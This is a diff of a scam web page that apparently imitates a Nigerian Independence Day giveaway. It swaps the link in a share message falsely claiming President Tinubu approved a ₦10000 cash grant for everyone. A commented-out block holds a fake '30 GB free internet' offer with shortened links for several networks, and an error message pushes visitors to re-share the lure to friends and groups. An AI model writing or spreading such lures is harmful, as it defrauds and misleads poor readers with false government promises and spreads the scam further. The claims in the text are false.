--- a/Independence-Day-10K-Gifts.html
+++ b/Independence-Day-10K-Gifts.html
@@ -586,7 +586,7 @@ $(document).click(function () {
 "*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
        <script>
-        var text1 = "*NIGERIA INDEPENDENCE DAY CELEBRATION..PRESIDENT TINUBU APPROVES ₦10000 NAIRA CASH GRANT TO EVERYONE TO CELEBRATE *%0A%0THE PRESIDENCY Approves ₦10000 Naira Cash Grant To Everyone To Celebrate Independence Day🎉%0A%0A*I just got mine Tap Below to get yours below🎉*%0A%0A_TAP HERE_👇%0Ahttps://dataplugz.org/Okpeholo-10GB-Victory-Gift.html",
+        var text1 = "*NIGERIA INDEPENDENCE DAY CELEBRATION..PRESIDENT TINUBU APPROVES ₦10000 NAIRA CASH GRANT TO EVERYONE TO CELEBRATE *%0A%0THE PRESIDENCY Approves ₦10000 Naira Cash Grant To Everyone To Celebrate Independence Day🎉%0A%0A*I just got mine Tap Below to get yours below🎉*%0A%0A_TAP HERE_👇%0Ahttps://mpetition.org/Independence-Day-10K-Gifts.html",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
